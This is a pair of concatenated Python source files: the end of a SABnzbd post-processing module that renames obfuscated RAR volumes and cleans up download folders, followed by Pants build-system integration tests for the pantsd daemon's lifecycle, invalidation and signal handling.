if not (os.path.isfile(file_to_check)):
continue
# The function will check if it's a RAR-file
# We do a sanity-check for the returned number
rar_vol, new_extension = rarvolinfo.get_rar_extension(file_to_check)
if 0 < rar_vol < 1000:
logging.debug("Detected volume-number %s from RAR-header: %s ", rar_vol, file_to_check)
volnrext[file_to_check] = (rar_vol, new_extension)
# The files inside rar file
rar_contents = rarfile.RarFile(os.path.join(workdir, file_to_check), single_file_check=True).filelist()
try:
rarvolnr[rar_vol]
except:
# does not yet exist, so create:
rarvolnr[rar_vol] = {}
rarvolnr[rar_vol][file_to_check] = rar_contents # store them for matching (if needed)
else:
logging.debug("No RAR-volume-number found in %s", file_to_check)
logging.debug("Deobfuscate: rarvolnr is: %s", rarvolnr)
logging.debug("Deobfuscate: volnrext is: %s", volnrext)
# Could be that there are no rar-files, we stop
if not len(rarvolnr):
return renamed_files
# Check number of different obfuscated rar sets:
numberofrarsets = len(rarvolnr[1])
if numberofrarsets == 1:
# Just one obfuscated rarset
logging.debug("Deobfuscate: Just one obfuscated rarset")
for filename in volnrext:
new_rar_name = "%s.%s" % (nzo.final_name, volnrext[filename][1])
new_rar_name = os.path.join(workdir, new_rar_name)
new_rar_name = get_unique_filename(new_rar_name)
logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
renamer(filename, new_rar_name)
renamed_files += 1
else:
# More than one obfuscated rarset, so we must do matching based of files inside the rar files
logging.debug("Number of obfuscated rarsets: %s", numberofrarsets)
# Assign (random) rar set names
rarsetname = {} # in which rar set it should be, so rar set 'A', or 'B', or ...
mychar = "A"
# First things first: Assigning a rarsetname to the rar file which have volume number 1
for base_obfuscated_filename in rarvolnr[1]:
rarsetname[base_obfuscated_filename] = mychar + "--" + nzo.final_name
mychar = chr(ord(mychar) + 1)
logging.debug("Deobfuscate: rarsetname %s", rarsetname)
# Do the matching, layer by layer (read: rarvolnumber)
# So, all rar files with rarvolnr 1, find the contents (files inside the rar),
# and match with rarfiles with rarvolnr 2, and put them in the correct rarset.
# And so on, until the highest rarvolnr minus 1 matched against highest rarvolnr
for n in range(1, len(rarvolnr.keys())):
logging.debug("Deobfuscate: Finding matches between rar sets %s and %s" % (n, n + 1))
for base_obfuscated_filename in rarvolnr[n]:
matchcounter = 0
for next_obfuscated_filename in rarvolnr[n + 1]:
# set() method with intersection (less strict): set(rarvolnr[n][base_obfuscated_filename]).intersection(set(rarvolnr[n+1][next_obfuscated_filename]))
# check if the last filename inside the existing rar matches with the first filename in the following rar
if rarvolnr[n][base_obfuscated_filename][-1] == rarvolnr[n + 1][next_obfuscated_filename][0]:
try:
rarsetname[next_obfuscated_filename] = rarsetname[base_obfuscated_filename]
matchcounter += 1
except KeyError:
logging.warning(T("No matching earlier rar file for %s"), next_obfuscated_filename)
if matchcounter > 1:
logging.info("Deobfuscate: more than one match, so risk on false positive matching.")
# Do the renaming:
for filename in rarsetname:
new_rar_name = "%s.%s" % (rarsetname[filename], volnrext[filename][1])
new_rar_name = os.path.join(workdir, new_rar_name)
new_rar_name = get_unique_filename(new_rar_name)
logging.debug("Deobfuscate: Renaming %s to %s" % (filename, new_rar_name))
renamer(filename, new_rar_name)
renamed_files += 1
# Done: The obfuscated rar files have now been renamed to regular formatted filenames
return renamed_files
def handle_empty_queue():
""" Check if empty queue calls for action """
if sabnzbd.NzbQueue.actives() == 0:
sabnzbd.save_state()
notifier.send_notification("SABnzbd", T("Queue finished"), "queue_done")
# Perform end-of-queue action when one is set
if sabnzbd.QUEUECOMPLETEACTION:
logging.info(
"Queue has finished, launching: %s (%s)", sabnzbd.QUEUECOMPLETEACTION, sabnzbd.QUEUECOMPLETEARG
)
if sabnzbd.QUEUECOMPLETEARG:
sabnzbd.QUEUECOMPLETEACTION(sabnzbd.QUEUECOMPLETEARG)
else:
Thread(target=sabnzbd.QUEUECOMPLETEACTION).start()
sabnzbd.change_queue_complete_action(cfg.queue_complete(), new=False)
def cleanup_list(wdir, skip_nzb):
"""Remove all files whose extension matches the cleanup list,
optionally ignoring the nzb extension
"""
if cfg.cleanup_list():
try:
files = os.listdir(wdir)
except:
files = ()
for filename in files:
path = os.path.join(wdir, filename)
if os.path.isdir(path):
cleanup_list(path, skip_nzb)
else:
if on_cleanup_list(filename, skip_nzb):
try:
logging.info("Removing unwanted file %s", path)
remove_file(path)
except:
logging.error(T("Removing %s failed"), clip_path(path))
logging.info("Traceback: ", exc_info=True)
if files:
# If directories only contained unwanted files, remove them
cleanup_empty_directories(wdir)
def prefix(path, pre):
"""Apply prefix to last part of path
'/my/path' and 'hi_' will give '/my/hi_path'
"""
p, d = os.path.split(path)
return os.path.join(p, pre + d)
def nzb_redirect(wdir, nzbname, pp, script, cat, priority):
"""Check if this job contains only NZB files,
if so send to queue and remove if on clean-up list
Returns list of processed NZB's
"""
files = listdir_full(wdir)
for nzb_file in files:
if get_ext(nzb_file) != ".nzb":
return None
# For multiple NZBs, cannot use the current job name
if len(files) != 1:
nzbname = None
# Process all NZB files
for nzb_file in files:
process_single_nzb(
get_filename(nzb_file),
nzb_file,
pp=pp,
script=script,
cat=cat,
priority=priority,
dup_check=False,
nzbname=nzbname,
)
return files
def one_file_or_folder(folder):
""" If the dir only contains one file or folder, join that file/folder onto the path """
if os.path.exists(folder) and os.path.isdir(folder):
try:
cont = os.listdir(folder)
if len(cont) == 1:
folder = os.path.join(folder, cont[0])
folder = one_file_or_folder(folder)
except OSError:
# Can occur on paths it doesn't like, for example "C:"
pass
return folder
TAG_RE = re.compile(r"<[^>]+>")
def get_last_line(txt):
""" Return last non-empty line of a text, trim to 150 max """
# First we remove HTML code in a basic way
txt = TAG_RE.sub(" ", txt)
# Then we get the last line
lines = txt.split("\n")
n = len(lines) - 1
while n >= 0 and not lines[n].strip("\r\t "):
n = n - 1
line = lines[n].strip("\r\t ")
if len(line) >= 150:
line = line[:147] + "..."
return line
def remove_samples(path):
"""Remove all files that match the sample pattern
Skip deleting if it matches all files or there is only 1 file
"""
files_to_delete = []
nr_files = 0
for root, _dirs, files in os.walk(path):
for file_to_match in files:
nr_files += 1
if RE_SAMPLE.search(file_to_match):
files_to_delete.append(os.path.join(root, file_to_match))
# Make sure we skip false-positives
if len(files_to_delete) < nr_files:
for path in files_to_delete:
try:
logging.info("Removing unwanted sample file %s", path)
remove_file(path)
except:
logging.error(T("Removing %s failed"), clip_path(path))
logging.info("Traceback: ", exc_info=True)
else:
logging.info("Skipping sample-removal, false-positive")
def rename_and_collapse_folder(oldpath, newpath, files):
"""Rename folder, collapsing when there's just a single subfolder
oldpath --> newpath OR oldpath/subfolder --> newpath
Modify list of filenames accordingly
"""
orgpath = oldpath
items = globber(oldpath)
if len(items) == 1:
folder = items[0]
folder_path = os.path.join(oldpath, folder)
if os.path.isdir(folder_path) and folder not in ("VIDEO_TS", "AUDIO_TS"):
logging.info("Collapsing %s", os.path.join(newpath, folder))
oldpath = folder_path
oldpath = os.path.normpath(oldpath)
newpath = os.path.normpath(newpath)
files = [os.path.normpath(f).replace(oldpath, newpath) for f in files]
renamer(oldpath, newpath)
try:
remove_dir(orgpath)
except:
pass
return files
def set_marker(folder):
""" Set marker file and return name """
name = cfg.marker_file()
if name:
path = os.path.join(folder, name)
logging.debug("Create marker file %s", path)
try:
fp = open(path, "w")
fp.close()
except:
logging.info("Cannot create marker file %s", path)
logging.info("Traceback: ", exc_info=True)
name = None
return name
def del_marker(path):
""" Remove marker file """
if path and os.path.exists(path):
logging.debug("Removing marker file %s", path)
try:
remove_file(path)
except:
logging.info("Cannot remove marker file %s", path)
logging.info("Traceback: ", exc_info=True)
def remove_from_list(name, lst):
if name:
for n in range(len(lst)):
if lst[n].endswith(name):
logging.debug("Popping %s", lst[n])
lst.pop(n)
return
def try_alt_nzb(nzo):
""" Try to get a new NZB if available """
url = nzo.nzo_info.get("failure")
if url and cfg.new_nzb_on_failure():
sabnzbd.add_url(url, nzo.pp, nzo.script, nzo.cat, nzo.priority)
|
test_pantsd_integration.py
|
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import datetime
import itertools
import os
import re
import signal
import threading
import time
import unittest
from textwrap import dedent
import pytest
from pants.testutil.pants_run_integration_test import read_pantsd_log
from pants.testutil.process_test_util import no_lingering_process_by_command
from pants.util.contextutil import environment_as, temporary_dir, temporary_file
from pants.util.dirutil import rm_rf, safe_file_dump, safe_mkdir, safe_open, touch
from pants_test.pantsd.pantsd_integration_test_base import PantsDaemonIntegrationTestBase
def launch_file_toucher(f):
"""Launch a loop to touch the given file, and return a function to call to stop and join it."""
if not os.path.isfile(f):
raise AssertionError("Refusing to touch a non-file.")
halt = threading.Event()
def file_toucher():
while not halt.isSet():
touch(f)
time.sleep(1)
thread = threading.Thread(target=file_toucher)
thread.daemon = True
thread.start()
def join():
halt.set()
thread.join(timeout=10)
return join
class TestPantsDaemonIntegration(PantsDaemonIntegrationTestBase):
def test_pantsd_compile(self):
with self.pantsd_successful_run_context("debug") as (pantsd_run, checker, _, _):
# This tests a deeper pantsd-based run by actually invoking a full compile.
pantsd_run(["compile", "examples/src/scala/org/pantsbuild/example/hello/welcome"])
checker.assert_started()
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7573")
def test_pantsd_run(self):
extra_config = {
"GLOBAL": {
# Muddies the logs with warnings: once all of the warnings in the repository
# are fixed, this can be removed.
"glob_expansion_failure": "ignore",
}
}
with self.pantsd_successful_run_context("debug", extra_config=extra_config) as (
pantsd_run,
checker,
workdir,
_,
):
pantsd_run(["list", "3rdparty:"])
checker.assert_started()
pantsd_run(["list", ":"])
checker.assert_running()
pantsd_run(["list", "::"])
checker.assert_running()
# And again using the cached BuildGraph.
pantsd_run(["list", "::"])
checker.assert_running()
# Assert there were no warnings or errors thrown in the pantsd log.
full_log = "\n".join(read_pantsd_log(workdir))
for line in read_pantsd_log(workdir):
# Ignore deprecation warning emissions.
if "DeprecationWarning" in line:
continue
# Check if the line begins with W or E to check if it is a warning or error line.
self.assertNotRegex(line, r"^[WE].*", f"error message detected in log:\n{full_log}")
def test_pantsd_broken_pipe(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
run = self.run_pants_with_workdir("help | head -1", workdir, pantsd_config, shell=True)
self.assertNotIn("broken pipe", run.stderr_data.lower())
checker.assert_started()
def test_pantsd_stacktrace_dump(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
pantsd_run(["-ldebug", "help"])
checker.assert_started()
os.kill(checker.pid, signal.SIGUSR2)
# Wait for log flush.
time.sleep(2)
self.assertIn("Current thread 0x", "\n".join(read_pantsd_log(workdir)))
def test_pantsd_pantsd_runner_doesnt_die_after_failed_run(self):
# Check for no stray pantsd prcesses.
with no_lingering_process_by_command("pantsd"):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
# Run target that throws an exception in pants.
self.assert_failure(
self.run_pants_with_workdir(
["lint", "testprojects/src/python/unicode/compilation_failure"],
workdir,
pantsd_config,
)
)
checker.assert_started()
# Assert pantsd is in a good functional state.
self.assert_success(self.run_pants_with_workdir(["help"], workdir, pantsd_config))
checker.assert_running()
@pytest.mark.flaky(retries=1) # https://github.com/pantsbuild/pants/issues/6114
def test_pantsd_lifecycle_invalidation(self):
"""Runs pants commands with pantsd enabled, in a loop, alternating between options that
should invalidate pantsd and incur a restart and then asserts for pid consistency."""
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (["debug", "help"], ["info", "help"])
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run([f"-l{cmd[0]}", cmd[1]])
next_pid = checker.assert_started()
if last_pid is not None:
self.assertNotEqual(last_pid, next_pid)
last_pid = next_pid
# Run with an env var.
pantsd_run(cmd[1:], {"GLOBAL": {"level": cmd[0]}})
checker.assert_running()
def test_pantsd_lifecycle_non_invalidation(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = (["-q", "help"], ["--no-colors", "help"], ["help"])
last_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 3)):
# Run with a CLI flag.
pantsd_run(cmd)
next_pid = checker.assert_started()
if last_pid is not None:
self.assertEqual(last_pid, next_pid)
last_pid = next_pid
def test_pantsd_lifecycle_non_invalidation_on_config_string(self):
with temporary_dir() as dist_dir_root, temporary_dir() as config_dir:
config_files = [
os.path.abspath(os.path.join(config_dir, f"pants.toml.{i}")) for i in range(2)
]
for config_file in config_files:
print(f"writing {config_file}")
with open(config_file, "w") as fh:
fh.write(f"[GLOBAL]\npants_distdir = \"{os.path.join(dist_dir_root, 'v1')}\"\n")
invalidating_config = os.path.join(config_dir, "pants.toml.invalidates")
with open(invalidating_config, "w") as fh:
fh.write(f"[GLOBAL]\npants_distdir = \"{os.path.join(dist_dir_root, 'v2')}\"\n")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
variants = [[f"--pants-config-files={f}", "help"] for f in config_files]
pantsd_pid = None
for cmd in itertools.chain(*itertools.repeat(variants, 2)):
pantsd_run(cmd)
if not pantsd_pid:
pantsd_pid = checker.assert_started()
else:
checker.assert_running()
pantsd_run([f"--pants-config-files={invalidating_config}", "help"])
self.assertNotEqual(pantsd_pid, checker.assert_started())
def test_pantsd_stray_runners(self):
# Allow env var overrides for local stress testing.
attempts = int(os.environ.get("PANTS_TEST_PANTSD_STRESS_ATTEMPTS", 20))
cmd = os.environ.get("PANTS_TEST_PANTSD_STRESS_CMD", "help").split()
with no_lingering_process_by_command("pantsd"):
with self.pantsd_successful_run_context("debug") as (pantsd_run, checker, _, _):
pantsd_run(cmd)
checker.assert_started()
for _ in range(attempts):
pantsd_run(cmd)
checker.assert_running()
# The runner can sometimes exit more slowly than the thin client caller.
time.sleep(3)
def test_pantsd_aligned_output(self):
# Set for pytest output display.
self.maxDiff = None
cmds = [["goals"], ["help"], ["targets"], ["roots"]]
non_daemon_runs = [self.run_pants(cmd) for cmd in cmds]
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
daemon_runs = [pantsd_run(cmd) for cmd in cmds]
checker.assert_started()
for cmd, run in zip(cmds, daemon_runs):
print(f"(cmd, run) = ({cmd}, {run.stdout_data}, {run.stderr_data})")
self.assertNotEqual(run.stdout_data, "", f"Empty stdout for {cmd}")
for run_pairs in zip(non_daemon_runs, daemon_runs):
self.assertEqual(*(run.stdout_data for run in run_pairs))
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7622")
def test_pantsd_filesystem_invalidation(self):
"""Runs with pantsd enabled, in a loop, while another thread invalidates files."""
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
cmd = ["list", "::"]
pantsd_run(cmd)
checker.assert_started()
# Launch a separate thread to poke files in 3rdparty.
join = launch_file_toucher("3rdparty/jvm/com/google/auto/value/BUILD")
# Repeatedly re-list 3rdparty while the file is being invalidated.
for _ in range(0, 16):
pantsd_run(cmd)
checker.assert_running()
join()
def test_pantsd_client_env_var_is_inherited_by_pantsd_runner_children(self):
EXPECTED_KEY = "TEST_ENV_VAR_FOR_PANTSD_INTEGRATION_TEST"
EXPECTED_VALUE = "333"
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
# First, launch the daemon without any local env vars set.
pantsd_run(["help"])
checker.assert_started()
# Then, set an env var on the secondary call.
# We additionally set the `HERMETIC_ENV` env var to allow the integration test harness
# to pass this variable through.
env = {
EXPECTED_KEY: EXPECTED_VALUE,
"HERMETIC_ENV": EXPECTED_KEY,
}
with environment_as(**env):
result = pantsd_run(
["-q", "run", "testprojects/src/python/print_env", "--", EXPECTED_KEY]
)
checker.assert_running()
self.assertEqual(EXPECTED_VALUE, "".join(result.stdout_data).strip())
def test_pantsd_launch_env_var_is_not_inherited_by_pantsd_runner_children(self):
with self.pantsd_test_context() as (workdir, pantsd_config, checker):
with environment_as(NO_LEAKS="33"):
self.assert_success(self.run_pants_with_workdir(["help"], workdir, pantsd_config))
checker.assert_started()
self.assert_failure(
self.run_pants_with_workdir(
["-q", "run", "testprojects/src/python/print_env", "--", "NO_LEAKS"],
workdir,
pantsd_config,
)
)
checker.assert_running()
def test_pantsd_touching_a_file_does_not_restart_daemon(self):
test_file = "testprojects/src/python/print_env/main.py"
config = {
"GLOBAL": {"pantsd_invalidation_globs": '["testprojects/src/python/print_env/*"]'}
}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run,
checker,
workdir,
_,
):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
touch(test_file)
# Permit ample time for the async file event propagate in CI.
time.sleep(10)
checker.assert_running()
def test_pantsd_invalidation_file_tracking(self):
test_dir = "testprojects/src/python/print_env"
config = {"GLOBAL": {"pantsd_invalidation_globs": f'["{test_dir}/*"]'}}
with self.pantsd_successful_run_context(extra_config=config) as (
pantsd_run,
checker,
workdir,
_,
):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
def full_pantsd_log():
return "\n".join(read_pantsd_log(workdir))
# Check the logs.
self.assertRegex(
full_pantsd_log(), r"watching invalidation patterns:.*{}".format(test_dir)
)
checker.assert_running()
# Create a new file in test_dir
with temporary_file(suffix=".py", binary_mode=False, root_dir=test_dir) as temp_f:
temp_f.write("import that\n")
temp_f.close()
time.sleep(10)
checker.assert_stopped()
self.assertIn("saw filesystem changes covered by invalidation globs", full_pantsd_log())
def test_pantsd_invalidation_pants_toml_file(self):
# Test tmp_pants_toml (--pants-config-files=$tmp_pants_toml)'s removal
tmp_pants_toml = os.path.abspath("testprojects/test_pants.toml")
# Create tmp_pants_toml file
with safe_open(tmp_pants_toml, "w") as f:
f.write("[DEFAULT]\n")
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
pantsd_run([f"--pants-config-files={tmp_pants_toml}", "help"])
checker.assert_started()
time.sleep(5)
# Delete tmp_pants_toml
os.unlink(tmp_pants_toml)
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_deleted(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
os.unlink(os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid"))
# Permit ample time for the async file event propagate in CI.
time.sleep(10)
checker.assert_stopped()
def test_pantsd_pid_change(self):
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
pantsd_run(["help"])
checker.assert_started()
# Let any fs events quiesce.
time.sleep(5)
checker.assert_running()
pidpath = os.path.join(config["GLOBAL"]["pants_subprocessdir"], "pantsd", "pid")
with open(pidpath, "w") as f:
f.write("9")
# Permit ample time for the async file event propagate in CI.
time.sleep(10)
checker.assert_stopped()
# Remove the pidfile so that the teardown script doesn't try to kill process 9.
os.unlink(pidpath)
@pytest.mark.flaky(retries=1) # https://github.com/pantsbuild/pants/issues/8193
def test_pantsd_memory_usage(self):
"""Validates that after N runs, memory usage has increased by no more than X percent."""
number_of_runs = 10
max_memory_increase_fraction = 0.40 # TODO https://github.com/pantsbuild/pants/issues/7647
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, config):
# NB: This doesn't actually run against all testprojects, only those that are in the chroot,
# i.e. explicitly declared in this test file's BUILD.
cmd = ["list", "testprojects::"]
self.assert_success(pantsd_run(cmd))
initial_memory_usage = checker.current_memory_usage()
for _ in range(number_of_runs):
self.assert_success(pantsd_run(cmd))
checker.assert_running()
final_memory_usage = checker.current_memory_usage()
self.assertTrue(
initial_memory_usage <= final_memory_usage,
"Memory usage inverted unexpectedly: {} > {}".format(
initial_memory_usage, final_memory_usage
),
)
increase_fraction = (float(final_memory_usage) / initial_memory_usage) - 1.0
self.assertTrue(
increase_fraction <= max_memory_increase_fraction,
"Memory usage increased more than expected: {} -> {}: {} actual increase (expected < {})".format(
initial_memory_usage,
final_memory_usage,
increase_fraction,
max_memory_increase_fraction,
),
)
def test_pantsd_invalidation_stale_sources(self):
test_path = "tests/python/pants_test/daemon_correctness_test_0001"
test_build_file = os.path.join(test_path, "BUILD")
test_src_file = os.path.join(test_path, "some_file.py")
has_source_root_regex = r'"source_root": ".*/{}"'.format(test_path)
export_cmd = ["export", test_path]
try:
with self.pantsd_successful_run_context() as (pantsd_run, checker, workdir, _):
safe_mkdir(test_path, clean=True)
pantsd_run(["help"])
checker.assert_started()
safe_file_dump(
test_build_file, "python_library(sources=globs('some_non_existent_file.py'))"
)
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_build_file, "python_library(sources=globs('*.py'))")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertNotRegex(result.stdout_data, has_source_root_regex)
safe_file_dump(test_src_file, "import this\n")
result = pantsd_run(export_cmd)
checker.assert_running()
self.assertRegex(result.stdout_data, has_source_root_regex)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_parse_exception_success(self):
# This test covers the case described in #6426, where a run that is failing fast due to an
# exception can race other completing work. We expect all runs to fail due to the error
# that has been introduced, but none of them should hang.
test_path = "testprojects/3rdparty/this_is_definitely_not_a_valid_directory"
test_build_file = os.path.join(test_path, "BUILD")
invalid_symbol = "this_is_definitely_not_a_valid_symbol"
try:
safe_mkdir(test_path, clean=True)
safe_file_dump(test_build_file, f"{invalid_symbol}()")
for _ in range(3):
with self.pantsd_run_context(success=False) as (pantsd_run, checker, _, _):
result = pantsd_run(["list", "testprojects::"])
checker.assert_started()
self.assertIn(invalid_symbol, result.stderr_data)
finally:
rm_rf(test_path)
@unittest.skip("TODO https://github.com/pantsbuild/pants/issues/7654")
def test_pantsd_multiple_parallel_runs(self):
with self.pantsd_test_context() as (workdir, config, checker):
file_to_make = os.path.join(workdir, "some_magic_file")
waiter_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:waiter", "--", file_to_make],
workdir,
config,
)
checker.assert_started()
checker.assert_pantsd_runner_started(waiter_handle.process.pid)
creator_handle = self.run_pants_with_workdir_without_waiting(
["run", "testprojects/src/python/coordinated_runs:creator", "--", file_to_make],
workdir,
config,
)
self.assert_success(creator_handle.join())
self.assert_success(waiter_handle.join())
def _assert_pantsd_keyboardinterrupt_signal(self, signum, regexps=[], quit_timeout=None):
"""Send a signal to the thin pailgun client and observe the error messaging.
:param int signum: The signal to send.
:param regexps: Assert that all of these regexps match somewhere in stderr.
:type regexps: list of str
:param float quit_timeout: The duration of time to wait for the pailgun client to flush all of
its output and die after being killed.
"""
# TODO: This tests that pantsd processes actually die after the thin client receives the
# specified signal.
with self.pantsd_test_context() as (workdir, config, checker):
# Launch a run that will wait for a file to be created (but do not create that file).
file_to_make = os.path.join(workdir, "some_magic_file")
if quit_timeout is not None:
timeout_args = [f"--pantsd-pailgun-quit-timeout={quit_timeout}"]
else:
timeout_args = []
argv = timeout_args + [
"run",
"testprojects/src/python/coordinated_runs:waiter",
"--",
file_to_make,
]
waiter_handle = self.run_pants_with_workdir_without_waiting(argv, workdir, config)
client_pid = waiter_handle.process.pid
checker.assert_started()
checker.assert_pantsd_runner_started(client_pid)
# Get all the pantsd processes while they're still around.
pantsd_runner_processes = checker.runner_process_context.current_processes()
# This should kill the pantsd processes through the RemotePantsRunner signal handler.
os.kill(client_pid, signum)
waiter_run = waiter_handle.join()
self.assert_failure(waiter_run)
for regexp in regexps:
self.assertRegex(waiter_run.stderr_data, regexp)
time.sleep(1)
for proc in pantsd_runner_processes:
# TODO: we could be checking the return codes of the subprocesses, but psutil is currently
# limited on non-Windows hosts -- see https://psutil.readthedocs.io/en/latest/#processes.
# The pantsd processes should be dead, and they should have exited with 1.
self.assertFalse(proc.is_running())
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7554")
def test_pantsd_sigterm(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGTERM,
regexps=[
"\\[INFO\\] Sending SIGTERM to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.",
re.escape(
"\nSignal {signum} (SIGTERM) was raised. Exiting with failure.\n".format(
signum=signal.SIGTERM
)
),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$""",
],
)
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7572")
def test_pantsd_sigquit(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGQUIT,
regexps=[
"\\[INFO\\] Sending SIGQUIT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.",
re.escape(
"\nSignal {signum} (SIGQUIT) was raised. Exiting with failure.\n".format(
signum=signal.SIGQUIT
)
),
"""
Interrupted by user:
Interrupted by user over pailgun client!
$""",
],
)
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7547")
def test_pantsd_sigint(self):
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=[
"""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 5\\.0 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user.
Interrupted by user:
Interrupted by user over pailgun client!
$"""
],
)
@unittest.skip("Flaky as described in: https://github.com/pantsbuild/pants/issues/7457")
def test_signal_pailgun_stream_timeout(self):
# NB: The actual timestamp has the date and time at sub-second granularity. The date is just
# used here since that is known in advance in order to assert that the timestamp is well-formed.
today = datetime.date.today().isoformat()
self._assert_pantsd_keyboardinterrupt_signal(
signal.SIGINT,
regexps=[
"""\
\\[INFO\\] Sending SIGINT to pantsd with pid [0-9]+, waiting up to 0\\.01 seconds before sending SIGKILL\\.\\.\\.
Interrupted by user\\.
[^ ]* \\[WARN\\] timed out when attempting to gracefully shut down the remote client executing \
"'pantsd.*'"\\. sending SIGKILL to the remote client at pid: [0-9]+\\. message: iterating \
over bytes from nailgun timed out with timeout interval 0\\.01 starting at {today}T[^\n]+, \
overtime seconds: [^\n]+
Interrupted by user:
Interrupted by user over pailgun client!
""".format(
today=re.escape(today)
)
],
# NB: Make the timeout very small to ensure the warning message will reliably occur in CI!
quit_timeout=1e-6,
)
@unittest.skip(
reason="This started consistently hanging on Jan. 13, 2020 for some unknown reason."
)
def test_sigint_kills_request_waiting_for_lock(self):
"""Test that, when a pailgun request is blocked waiting for another one to end, sending
SIGINT to the blocked run will kill it.
Regression test for issue: #7920
"""
config = {"GLOBAL": {"pantsd_timeout_when_multiple_invocations": -1, "level": "debug"}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
# Run a repl, so that any other run waiting to acquire the daemon lock waits forever.
first_run_handle = self.run_pants_with_workdir_without_waiting(
command=["repl", "examples/src/python/example/hello::"],
workdir=workdir,
config=config,
)
checker.assert_started()
checker.assert_running()
blocking_run_handle = self.run_pants_with_workdir_without_waiting(
command=["goals"], workdir=workdir, config=config
)
# Block until the second request is waiting for the lock.
blocked = True
while blocked:
log = "\n".join(read_pantsd_log(workdir))
if "didn't aquire the lock on the first try, polling." in log:
blocked = False
# NB: This sleep is totally deterministic, it's just so that we don't spend too many cycles
# busy waiting.
time.sleep(0.1)
# Sends SIGINT to the run that is waiting.
blocking_run_client_pid = blocking_run_handle.process.pid
os.kill(blocking_run_client_pid, signal.SIGINT)
blocking_run_handle.join()
# Check that pantsd is still serving the other request.
checker.assert_running()
# Send exit() to the repl, and exit it.
result = first_run_handle.join(stdin_data="exit()")
self.assert_success(result)
checker.assert_running()
def test_pantsd_environment_scrubbing(self):
# This pair of JVM options causes the JVM to always crash, so the command will fail if the env
# isn't stripped.
with self.pantsd_successful_run_context(
extra_config={"compile.rsc": {"jvm_options": ["-Xmx1g"]}},
extra_env={"_JAVA_OPTIONS": "-Xms2g"},
) as (pantsd_run, checker, workdir, _):
pantsd_run(["help"])
checker.assert_started()
result = pantsd_run(
["compile", "examples/src/java/org/pantsbuild/example/hello/simple"]
)
self.assert_success(result)
def test_pantsd_unicode_environment(self):
with self.pantsd_successful_run_context(extra_env={"XXX": "¡"},) as (
pantsd_run,
checker,
workdir,
_,
):
result = pantsd_run(["help"])
checker.assert_started()
self.assert_success(result)
def test_daemon_auto_shutdown_after_first_run(self):
config = {"GLOBAL": {"shutdown_pantsd_after_run": True}}
with self.pantsd_test_context(extra_config=config) as (workdir, config, checker):
wait_handle = self.run_pants_with_workdir_without_waiting(["list"], workdir, config,)
# TODO(#6574, #7330): We might have a new default timeout after these are resolved.
checker.assert_started(timeout=16)
pantsd_processes = checker.runner_process_context.current_processes()
pants_run = wait_handle.join()
self.assert_success(pants_run)
# Permit enough time for the process to terminate in CI
time.sleep(5)
for process in pantsd_processes:
self.assertFalse(process.is_running())
# This is a regression test for a bug where we would incorrectly detect a cycle if two targets swapped their
# dependency relationship (#7404).
def test_dependencies_swap(self):
template = dedent(
"""
python_library(
name = 'A',
source = 'A.py',
{a_deps}
)
python_library(
name = 'B',
source = 'B.py',
{b_deps}
)
"""
)
with self.pantsd_successful_run_context() as (pantsd_run, checker, _, _):
with temporary_dir(".") as directory:
safe_file_dump(os.path.join(directory, "A.py"), mode="w")
safe_file_dump(os.path.join(directory, "B.py"), mode="w")
if directory.startswith("./"):
directory = directory[2:]
def list_and_verify():
result = pantsd_run(["list", f"{directory}:"])
checker.assert_started()
self.assert_success(result)
expected_targets = {f"{directory}:{target}" for target in ("A", "B")}
self.assertEqual(expected_targets, set(result.stdout_data.strip().split("\n")))
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps='dependencies = [":B"],', b_deps=""))
list_and_verify()
with open(os.path.join(directory, "BUILD"), "w") as f:
f.write(template.format(a_deps="", b_deps='dependencies = [":A"],'))
